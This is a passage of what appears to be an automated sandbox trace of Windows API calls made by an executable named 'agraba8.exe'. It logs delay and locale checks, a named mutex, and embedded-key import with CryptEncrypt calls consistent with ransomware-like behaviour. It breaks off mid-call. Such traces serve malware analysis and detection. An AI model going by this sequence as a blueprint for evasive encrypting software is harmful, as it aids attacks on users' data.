¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÇW\x19I\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0078.811] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x4822d0, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\agraba8.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\agraba8.exe")) returned 0x30 [0078.811] GetLastError () returned 0x0 [0078.811] SetLastError (dwErrCode=0x0) [0078.811] GetLastError () returned 0x0 [0078.811] SetLastError (dwErrCode=0x0) [0078.811] GetLastError () returned 0x0 [0078.811] SetLastError (dwErrCode=0x0) [0078.811] GetLastError () returned 0x0 [0078.811] SetLastError (dwErrCode=0x0) [0078.811] GetLastError () returned 0x0 [0078.811] SetLastError (dwErrCode=0x0) [0078.811] GetLastError () returned 0x0 [0078.811] SetLastError (dwErrCode=0x0) [0078.811] GetLastError () returned 0x0 [0078.811] SetLastError (dwErrCode=0x0) [0078.811] GetLastError () returned 0x0 [0078.811] SetLastError (dwErrCode=0x0) [0078.811] GetLastError () returned 0x0 [0078.811] SetLastError (dwErrCode=0x0) [0078.811] GetLastError () returned 0x0 [0078.811] SetLastError (dwErrCode=0x0) [0078.811] GetLastError () returned 0x0 [0078.811] SetLastError (dwErrCode=0x0) [0078.812] GetLastError () returned 0x0 [0078.812] SetLastError (dwErrCode=0x0) [0078.812] GetLastError () returned 0x0 [0078.812] SetLastError (dwErrCode=0x0) [0078.812] GetLastError () returned 0x0 [0078.812] SetLastError (dwErrCode=0x0) [0078.812] GetLastError () returned 0x0 [0078.812] SetLastError (dwErrCode=0x0) [0078.812] GetLastError () returned 0x0 [0078.812] SetLastError (dwErrCode=0x0) [0078.812] GetLastError () returned 0x0 [0078.812] SetLastError (dwErrCode=0x0) [0078.812] GetLastError () returned 0x0 [0078.812] SetLastError (dwErrCode=0x0) [0078.812] GetLastError () returned 0x0 [0078.812] SetLastError (dwErrCode=0x0) [0078.812] GetLastError () returned 0x0 [0078.812] SetLastError (dwErrCode=0x0) [0078.812] GetLastError () returned 0x0 [0078.812] SetLastError (dwErrCode=0x0) [0078.812] GetLastError () returned 0x0 [0078.812] SetLastError (dwErrCode=0x0) [0078.812] GetLastError () returned 0x0 [0078.812] SetLastError (dwErrCode=0x0) [0078.812] GetLastError () returned 0x0 [0078.812] SetLastError (dwErrCode=0x0) [0078.812] GetLastError () returned 0x0 [0078.812] SetLastError (dwErrCode=0x0) [0078.812] GetLastError () returned 0x0 [0078.812] SetLastError (dwErrCode=0x0) [0078.812] GetLastError () returned 0x0 [0078.812] SetLastError (dwErrCode=0x0) [0078.812] GetLastError () returned 0x0 [0078.812] SetLastError (dwErrCode=0x0) [0078.812] GetLastError () returned 0x0 [0078.812] SetLastError (dwErrCode=0x0) [0078.812] GetLastError () returned 0x0 [0078.812] SetLastError (dwErrCode=0x0) [0078.812] GetLastError () returned 0x0 [0078.812] SetLastError (dwErrCode=0x0) [0078.812] GetLastError () returned 0x0 [0078.813] SetLastError (dwErrCode=0x0) [0078.813] GetLastError () returned 0x0 [0078.813] SetLastError (dwErrCode=0x0) [0078.813] GetLastError () returned 0x0 [0078.813] SetLastError (dwErrCode=0x0) [0078.813] GetLastError () returned 0x0 [0078.813] SetLastError (dwErrCode=0x0) [0078.813] GetLastError () returned 0x0 [0078.813] SetLastError (dwErrCode=0x0) [0078.813] GetLastError () returned 0x0 [0078.813] SetLastError (dwErrCode=0x0) [0078.813] GetLastError () returned 0x0 [0078.813] SetLastError (dwErrCode=0x0) [0078.813] GetLastError () returned 0x0 [0078.813] SetLastError (dwErrCode=0x0) [0078.813] GetLastError () returned 0x0 [0078.813] SetLastError (dwErrCode=0x0) [0078.813] GetLastError () returned 0x0 [0078.813] SetLastError (dwErrCode=0x0) [0078.813] GetLastError () returned 0x0 [0078.813] SetLastError (dwErrCode=0x0) [0078.813] GetLastError () returned 0x0 [0078.813] SetLastError (dwErrCode=0x0) [0078.813] GetLastError () returned 0x0 [0078.813] SetLastError (dwErrCode=0x0) [0078.813] GetLastError () returned 0x0 [0078.813] SetLastError (dwErrCode=0x0) [0078.813] GetLastError () returned 0x0 [0078.813] SetLastError (dwErrCode=0x0) [0078.813] GetLastError () returned 0x0 [0078.813] SetLastError (dwErrCode=0x0) [0078.813] GetLastError () returned 0x0 [0078.813] SetLastError (dwErrCode=0x0) [0078.813] GetLastError () returned 0x0 [0078.813] SetLastError (dwErrCode=0x0) [0078.813] GetLastError () returned 0x0 [0078.813] SetLastError (dwErrCode=0x0) [0078.813] GetLastError () returned 0x0 [0078.813] SetLastError (dwErrCode=0x0) [0078.813] GetLastError () returned 0x0 [0078.813] SetLastError (dwErrCode=0x0) [0078.814] GetLastError () returned 0x0 [0078.814] SetLastError (dwErrCode=0x0) [0078.814] GetLastError () returned 0x0 [0078.814] SetLastError (dwErrCode=0x0) [0078.814] GetLastError () returned 0x0 [0078.814] SetLastError (dwErrCode=0x0) [0078.814] GetLastError () returned 0x0 [0078.814] SetLastError (dwErrCode=0x0) [0078.814] GetLastError () returned 0x0 [0078.814] SetLastError (dwErrCode=0x0) [0078.814] GetLastError () returned 0x0 [0078.814] SetLastError (dwErrCode=0x0) [0078.814] GetLastError () returned 0x0 [0078.814] SetLastError (dwErrCode=0x0) [0078.814] GetLastError () returned 0x0 [0078.814] SetLastError (dwErrCode=0x0) [0078.814] GetLastError () returned 0x0 [0078.814] SetLastError (dwErrCode=0x0) [0078.814] GetLastError () returned 0x0 [0078.814] SetLastError (dwErrCode=0x0) [0078.814] GetLastError () returned 0x0 [0078.814] SetLastError (dwErrCode=0x0) [0078.814] GetLastError () returned 0x0 [0078.814] SetLastError (dwErrCode=0x0) [0078.814] GetLastError () returned 0x0 [0078.814] SetLastError (dwErrCode=0x0) [0078.814] GetLastError () returned 0x0 [0078.814] SetLastError (dwErrCode=0x0) [0078.814] GetLastError () returned 0x0 [0078.814] SetLastError (dwErrCode=0x0) [0078.814] GetLastError () returned 0x0 [0078.814] SetLastError (dwErrCode=0x0) [0078.814] GetLastError () returned 0x0 [0078.814] SetLastError (dwErrCode=0x0) [0078.814] GetLastError () returned 0x0 [0078.814] SetLastError (dwErrCode=0x0) [0078.814] GetLastError () returned 0x0 [0078.814] SetLastError (dwErrCode=0x0) [0078.814] GetLastError () returned 0x0 [0078.814] SetLastError (dwErrCode=0x0) [0078.814] GetLastError () returned 0x0 [0078.815] SetLastError (dwErrCode=0x0) [0078.815] GetLastError () returned 0x0 [0078.815] SetLastError (dwErrCode=0x0) [0078.815] GetLastError () returned 0x0 [0078.815] SetLastError (dwErrCode=0x0) [0078.815] GetLastError () returned 0x0 [0078.815] SetLastError (dwErrCode=0x0) [0078.815] GetLastError () returned 0x0 [0078.815] SetLastError (dwErrCode=0x0) [0078.815] GetLastError () returned 0x0 [0078.815] SetLastError (dwErrCode=0x0) [0078.815] GetLastError () returned 0x0 [0078.815] SetLastError (dwErrCode=0x0) [0078.815] GetLastError () returned 0x0 [0078.815] SetLastError (dwErrCode=0x0) [0078.815] GetLastError () returned 0x0 [0078.815] SetLastError (dwErrCode=0x0) [0078.815] GetLastError () returned 0x0 [0078.815] SetLastError (dwErrCode=0x0) [0078.815] GetLastError () returned 0x0 [0078.815] SetLastError (dwErrCode=0x0) [0078.815] GetLastError () returned 0x0 [0078.815] SetLastError (dwErrCode=0x0) [0078.815] GetLastError () returned 0x0 [0078.815] SetLastError (dwErrCode=0x0) [0078.815] GetLastError () returned 0x0 [0078.815] SetLastError (dwErrCode=0x0) [0078.815] GetLastError () returned 0x0 [0078.815] SetLastError (dwErrCode=0x0) [0078.815] GetLastError () returned 0x0 [0078.815] SetLastError (dwErrCode=0x0) [0078.815] GetLastError () returned 0x0 [0078.815] SetLastError (dwErrCode=0x0) [0078.815] GetLastError () returned 0x0 [0078.815] SetLastError (dwErrCode=0x0) [0078.815] GetLastError () returned 0x0 [0078.815] SetLastError (dwErrCode=0x0) [0078.815] GetLastError () returned 0x0 [0078.815] SetLastError (dwErrCode=0x0) [0078.815] GetLastError () returned 0x0 [0078.815] SetLastError (dwErrCode=0x0) [0078.815] GetLastError () returned 0x0 [0078.816] SetLastError (dwErrCode=0x0) [0078.816] GetLastError () returned 0x0 [0078.816] SetLastError (dwErrCode=0x0) [0078.816] GetLastError () returned 0x0 [0078.816] SetLastError (dwErrCode=0x0) [0078.816] GetLastError () returned 0x0 [0078.816] SetLastError (dwErrCode=0x0) [0078.816] GetLastError () returned 0x0 [0078.816] SetLastError (dwErrCode=0x0) [0078.816] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0078.816] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x405ec6) returned 0x0 [0078.817] GetLastError () returned 0x0 [0078.817] SetLastError (dwErrCode=0x0) [0078.817] GetLastError () returned 0x0 [0078.817] SetLastError (dwErrCode=0x0) [0078.817] GetLastError () returned 0x0 [0078.817] SetLastError (dwErrCode=0x0) [0078.817] GetLastError () returned 0x0 [0078.817] SetLastError (dwErrCode=0x0) [0078.817] GetLastError () returned 0x0 [0078.817] SetLastError (dwErrCode=0x0) [0078.817] GetLastError () returned 0x0 [0078.817] SetLastError (dwErrCode=0x0) [0078.817] GetLastError () returned 0x0 [0078.817] SetLastError (dwErrCode=0x0) [0078.817] GetLastError () returned 0x0 [0078.817] SetLastError (dwErrCode=0x0) [0078.817] GetLastError () returned 0x0 [0078.817] SetLastError (dwErrCode=0x0) [0078.817] GetLastError () returned 0x0 [0078.817] SetLastError (dwErrCode=0x0) [0078.817] GetLastError () returned 0x0 [0078.817] SetLastError (dwErrCode=0x0) [0078.817] GetLastError () returned 0x0 [0078.817] SetLastError (dwErrCode=0x0) [0078.817] GetLastError () returned 0x0 [0078.817] SetLastError (dwErrCode=0x0) [0078.818] GetLastError () returned 0x0 [0078.818] SetLastError (dwErrCode=0x0) [0078.818] GetLastError () returned 0x0 [0078.818] SetLastError (dwErrCode=0x0) [0078.818] GetLastError () returned 0x0 [0078.818] SetLastError (dwErrCode=0x0) [0078.818] GetLastError () returned 0x0 [0078.818] SetLastError (dwErrCode=0x0) [0078.818] GetLastError () returned 0x0 [0078.818] SetLastError (dwErrCode=0x0) [0078.818] GetLastError () returned 0x0 [0078.818] SetLastError (dwErrCode=0x0) [0078.818] GetLastError () returned 0x0 [0078.818] SetLastError (dwErrCode=0x0) [0078.818] GetLastError () returned 0x0 [0078.818] SetLastError (dwErrCode=0x0) [0078.818] GetLastError () returned 0x0 [0078.818] SetLastError (dwErrCode=0x0) [0078.818] GetLastError () returned 0x0 [0078.818] SetLastError (dwErrCode=0x0) [0078.818] GetLastError () returned 0x0 [0078.818] SetLastError (dwErrCode=0x0) [0078.818] GetLastError () returned 0x0 [0078.818] SetLastError (dwErrCode=0x0) [0078.818] GetLastError () returned 0x0 [0078.818] SetLastError (dwErrCode=0x0) [0078.818] GetLastError () returned 0x0 [0078.818] SetLastError (dwErrCode=0x0) [0078.818] GetLastError () returned 0x0 [0078.818] SetLastError (dwErrCode=0x0) [0078.818] GetLastError () returned 0x0 [0078.818] SetLastError (dwErrCode=0x0) [0078.818] GetLastError () returned 0x0 [0078.818] SetLastError (dwErrCode=0x0) [0078.818] GetLastError () returned 0x0 [0078.818] SetLastError (dwErrCode=0x0) [0078.818] GetLastError () returned 0x0 [0078.818] SetLastError (dwErrCode=0x0) [0078.818] GetLastError () returned 0x0 [0078.818] SetLastError (dwErrCode=0x0) [0078.818] GetLastError () returned 0x0 [0078.819] SetLastError (dwErrCode=0x0) [0078.819] GetLastError () returned 0x0 [0078.819] SetLastError (dwErrCode=0x0) [0078.819] GetLastError () returned 0x0 [0078.819] SetLastError (dwErrCode=0x0) [0078.819] GetLastError () returned 0x0 [0078.819] SetLastError (dwErrCode=0x0) [0078.819] GetLastError () returned 0x0 [0078.819] SetLastError (dwErrCode=0x0) [0078.819] GetLastError () returned 0x0 [0078.819] SetLastError (dwErrCode=0x0) [0078.819] GetLastError () returned 0x0 [0078.819] SetLastError (dwErrCode=0x0) [0078.819] GetLastError () returned 0x0 [0078.819] SetLastError (dwErrCode=0x0) [0078.819] GetLastError () returned 0x0 [0078.819] SetLastError (dwErrCode=0x0) [0078.819] GetLastError () returned 0x0 [0078.819] SetLastError (dwErrCode=0x0) [0078.819] GetLastError () returned 0x0 [0078.819] SetLastError (dwErrCode=0x0) [0078.819] GetLastError () returned 0x0 [0078.819] SetLastError (dwErrCode=0x0) [0078.819] GetLastError () returned 0x0 [0078.819] SetLastError (dwErrCode=0x0) [0078.819] GetLastError () returned 0x0 [0078.819] SetLastError (dwErrCode=0x0) [0078.819] GetLastError () returned 0x0 [0078.819] SetLastError (dwErrCode=0x0) [0078.819] GetLastError () returned 0x0 [0078.819] SetLastError (dwErrCode=0x0) [0078.819] GetLastError () returned 0x0 [0078.819] SetLastError (dwErrCode=0x0) [0078.819] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0078.822] VirtualAlloc (lpAddress=0x0, dwSize=0xb9c, flAllocationType=0x3000, flProtect=0x4) returned 0x260000 [0078.823] VirtualAlloc (lpAddress=0x0, dwSize=0x6493, flAllocationType=0x3000, flProtect=0x4) returned 0x270000 [0078.824] VirtualFree (lpAddress=0x260000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.824] SetErrorMode (uMode=0x8003) returned 0x0 [0078.824] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x41e880) returned 0x405ec6 [0078.824] GetCurrentProcess () returned 0xffffffff [0078.824] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x80, TokenHandle=0x18fcdc | out: TokenHandle=0x18fcdc*=0xd8) returned 1 [0078.824] SetTokenInformation (TokenHandle=0xd8, TokenInformationClass=0x18, TokenInformation=0x18fcd8, TokenInformationLength=0x4) returned 1 [0078.825] CloseHandle (hObject=0xd8) returned 1 [0078.825] GetSystemDefaultLangID () returned 0x5e0409 [0078.825] GetUserDefaultLangID () returned 0x409 [0078.825] GetUserDefaultUILanguage () returned 0x409 [0078.826] Sleep (dwMilliseconds=0x7918) [0088.854] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f8c0, nSize=0x208 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\agraba8.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\agraba8.exe")) returned 0x30 [0088.854] GetTempPathW (in: nBufferLength=0x208, lpBuffer=0x18f8c4 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\") returned 0x25 [0088.854] GetWindowsDirectoryA (in: lpBuffer=0x18fb2c, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0088.855] GetVolumeNameForVolumeMountPointA (in: lpszVolumeMountPoint="C:\\Windows\\", lpszVolumeName=0x18fb14, cchBufferLength=0x104 | out: lpszVolumeName="6û\x18") returned 0 [0088.855] GetLastError () returned 0x1126 [0088.855] RaiseException (dwExceptionCode=0xe06d7363, dwExceptionFlags=0x1, nNumberOfArguments=0x3, lpArguments=0x18faf8) [0088.863] GetLastError () returned 0x1126 [0088.863] SetLastError (dwErrCode=0x1126) [0088.863] RtlUnwind (TargetFrame=0x18fcd0, TargetIp=0x40148b, ExceptionRecord=0x18f5c8, ReturnValue=0x0) [0088.863] GetLastError () returned 0x1126 [0088.863] SetLastError (dwErrCode=0x1126) [0088.863] GetLastError () returned 0x1126 [0088.863] SetLastError (dwErrCode=0x1126) [0088.863] GetLastError () returned 0x1126 [0088.863] SetLastError (dwErrCode=0x1126) [0088.863] GetLastError () returned 0x1126 [0088.863] SetLastError (dwErrCode=0x1126) [0088.863] GetLastError () returned 0x1126 [0088.863] SetLastError (dwErrCode=0x1126) [0088.863] GetLastError () returned 0x1126 [0088.863] SetLastError (dwErrCode=0x1126) [0088.863] GetLastError () returned 0x1126 [0088.864] SetLastError (dwErrCode=0x1126) [0088.864] GetLastError () returned 0x1126 [0088.864] SetLastError (dwErrCode=0x1126) [0088.864] GetLastError () returned 0x1126 [0088.864] SetLastError (dwErrCode=0x1126) [0088.864] GetLastError () returned 0x1126 [0088.864] SetLastError (dwErrCode=0x1126) [0088.864] GetLastError () returned 0x1126 [0088.864] SetLastError (dwErrCode=0x1126) [0088.864] GetLastError () returned 0x1126 [0088.864] SetLastError (dwErrCode=0x1126) [0088.864] GetLastError () returned 0x1126 [0088.864] SetLastError (dwErrCode=0x1126) [0088.864] GetLastError () returned 0x1126 [0088.864] SetLastError (dwErrCode=0x1126) [0088.864] GetVolumeNameForVolumeMountPointA (in: lpszVolumeMountPoint="C:\\", lpszVolumeName=0x18fb14, cchBufferLength=0x104 | out: lpszVolumeName="\\\\?\\Volume{bb11c9c2-5dad-11e7-a275-806e6f6e6963}\\") returned 1 [0088.864] CryptAcquireContextA (in: phProv=0x18fcc0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18fcc0*=0x5f21d8) returned 1 [0088.924] CryptCreateHash (in: hProv=0x5f21d8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x18fcc4 | out: phHash=0x18fcc4) returned 1 [0088.924] CryptHashData (hHash=0x5d0ba0, pbData=0x571398, dwDataLen=0x26, dwFlags=0x0) returned 1 [0088.924] CryptGetHashParam (in: hHash=0x5d0ba0, dwParam=0x2, pbData=0x18fb7c, pdwDataLen=0x18fc18, dwFlags=0x0 | out: pbData=0x18fb7c, pdwDataLen=0x18fc18) returned 1 [0088.924] CryptDestroyHash (hHash=0x5d0ba0) returned 1 [0088.924] CryptReleaseContext (hProv=0x5f21d8, dwFlags=0x0) returned 1 [0088.925] OpenMutexA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\Ga6a7a:a3a5aCaFa:a7a7a4a5a2aCaCa") returned 0x0 [0088.925] OpenMutexA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Local\\Ga6a7a:a3a5aCaFa:a7a7a4a5a2aCaCa") returned 0x0 [0088.925] AllocateAndInitializeSid (in: pIdentifierAuthority=0x18fc44, nSubAuthorityCount=0x1, nSubAuthority0=0x0, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x18fc50 | out: pSid=0x18fc50) returned 1 [0088.925] SetEntriesInAclA () returned 0x0 [0088.937] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x18fc24, dwRevision=0x1 | out: pSecurityDescriptor=0x18fc24) returned 1 [0088.937] SetSecurityDescriptorDacl (in: pSecurityDescriptor=0x18fc24, bDaclPresent=1, pDacl=0x5f1940, bDaclDefaulted=0 | out: pSecurityDescriptor=0x18fc24) returned 1 [0088.937] CreateEventA (lpEventAttributes=0x18fc38, bManualReset=0, bInitialState=0, lpName="Global\\Ga6a7a:a3a5aCaFa:a7a7a4a5a2aCaCa") returned 0xdc [0088.937] LocalFree (hMem=0x5f1940) returned 0x0 [0088.937] AllocateAndInitializeSid (in: pIdentifierAuthority=0x18fc44, nSubAuthorityCount=0x1, nSubAuthority0=0x0, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x18fc50 | out: pSid=0x18fc50) returned 1 [0088.937] SetEntriesInAclA () returned 0x0 [0088.937] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x18fc24, dwRevision=0x1 | out: pSecurityDescriptor=0x18fc24) returned 1 [0088.937] SetSecurityDescriptorDacl (in: pSecurityDescriptor=0x18fc24, bDaclPresent=1, pDacl=0x5f1940, bDaclDefaulted=0 | out: pSecurityDescriptor=0x18fc24) returned 1 [0088.937] CreateEventA (lpEventAttributes=0x18fc38, bManualReset=0, bInitialState=0, lpName="Local\\Ga6a7a:a3a5aCaFa:a7a7a4a5a2aCaCa") returned 0x100 [0088.937] LocalFree (hMem=0x5f1940) returned 0x0 [0088.937] GlobalFindAtomA (lpString="_56924BE966341BB") returned 0x0 [0088.937] FindAtomA (lpString="_56924BE966341BB") returned 0x0 [0088.938] CryptAcquireContextA (in: phProv=0x18fcc4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18fcc4*=0x5d0ba0) returned 1 [0088.938] CryptImportKey (in: hProv=0x5d0ba0, pbData=0x18fc24, dwDataLen=0x94, hPubKey=0x0, dwFlags=0x0, phKey=0x18fcc4 | out: phKey=0x18fcc4*=0x5f2330) returned 1 [0088.938] CryptGetKeyParam (in: hKey=0x5f2330, dwParam=0x9, pbData=0x18fcbc, pdwDataLen=0x18fcc4, dwFlags=0x0 | out: pbData=0x18fcbc*=0x400, pdwDataLen=0x18fcc4*=0x4) returned 1 [0088.939] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18fcbc | out: pbBuffer=0x18fcbc) returned 1 [0088.939] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18fcbc | out: pbBuffer=0x18fcbc) returned 1 [0088.939] DsRoleGetPrimaryDomainInformation () returned 0x0 [0088.942] DsRoleFreeMemory () returned 0x0 [0088.942] GetVersionExA (in: lpVersionInformation=0x18faa4*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18faa4*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.942] GetSystemMetrics (nIndex=89) returned 0 [0088.961] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x751d0000 [0088.961] GetProcAddress (hModule=0x751d0000, lpProcName="IsWow64Process") returned 0x751e195e [0088.961] GetCurrentProcess () returned 0xffffffff [0088.961] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18f824 | out: Wow64Process=0x18f824) returned 1 [0088.961] GetUserDefaultUILanguage () returned 0x409 [0088.961] GetLocaleInfoA (in: Locale=0x409, LCType=0x59, lpLCData=0x18f7e8, cchData=32 | out: lpLCData="en") returned 3 [0088.961] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x1, pbBuffer=0x18f80b | out: pbBuffer=0x18f80b) returned 1 [0088.961] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x20, pbBuffer=0x18f6f4 | out: pbBuffer=0x18f6f4) returned 1 [0088.961] CryptImportKey (in: hProv=0x5d0ba0, pbData=0x18f36c, dwDataLen=0x8c, hPubKey=0x0, dwFlags=0x100, phKey=0x18f7c8 | out: phKey=0x18f7c8*=0x5f44c0) returned 1 [0088.962] CryptCreateHash (in: hProv=0x5d0ba0, Algid=0x8009, hKey=0x5f44c0, dwFlags=0x0, phHash=0x18f7cc | out: phHash=0x18f7cc) returned 1 [0088.962] CryptSetHashParam (hHash=0x5f73a8, dwParam=0x5, pbData=0x18f3f0, dwFlags=0x0) returned 1 [0088.962] CryptImportKey (in: hProv=0x5d0ba0, pbData=0x18f36c, dwDataLen=0x8c, hPubKey=0x0, dwFlags=0x100, phKey=0x18f7c0 | out: phKey=0x18f7c0*=0x5f73e8) returned 1 [0088.962] CryptCreateHash (in: hProv=0x5d0ba0, Algid=0x8009, hKey=0x5f73e8, dwFlags=0x0, phHash=0x18f7c4 | out: phHash=0x18f7c4) returned 1 [0088.962] CryptSetHashParam (hHash=0x5f9678, dwParam=0x5, pbData=0x18f3f0, dwFlags=0x0) returned 1 [0088.962] CryptHashData (hHash=0x5f73a8, pbData=0x571498, dwDataLen=0xfa, dwFlags=0x0) returned 1 [0088.962] CryptGetHashParam (in: hHash=0x5f73a8, dwParam=0x2, pbData=0x18f715, pdwDataLen=0x18f804, dwFlags=0x0 | out: pbData=0x18f715, pdwDataLen=0x18f804) returned 1 [0088.963] CryptEncrypt (in: hKey=0x5f2330, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x18f6f4*, pdwDataLen=0x18f440*=0x35, dwBufLen=0x80 | out: pbData=0x18f6f4*, pdwDataLen=0x18f440*=0x80) returned 1 [0088.963] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f42c | out: pbBuffer=0x18f42c) returned 1 [0088.963] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.964] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.964] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.964] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.964] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.964] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.964] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f42c | out: pbBuffer=0x18f42c) returned 1 [0088.964] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.964] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.964] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.964] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.964] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.964] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.964] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.964] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f42c | out: pbBuffer=0x18f42c) returned 1 [0088.964] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.964] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.964] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.964] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.965] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.965] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.965] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.965] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.965] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f42c | out: pbBuffer=0x18f42c) returned 1 [0088.965] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.965] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.965] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.965] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.965] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.965] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.965] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.965] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f42c | out: pbBuffer=0x18f42c) returned 1 [0088.965] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.965] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.965] CryptGenRandom (in: hProv=0x5d0ba0, 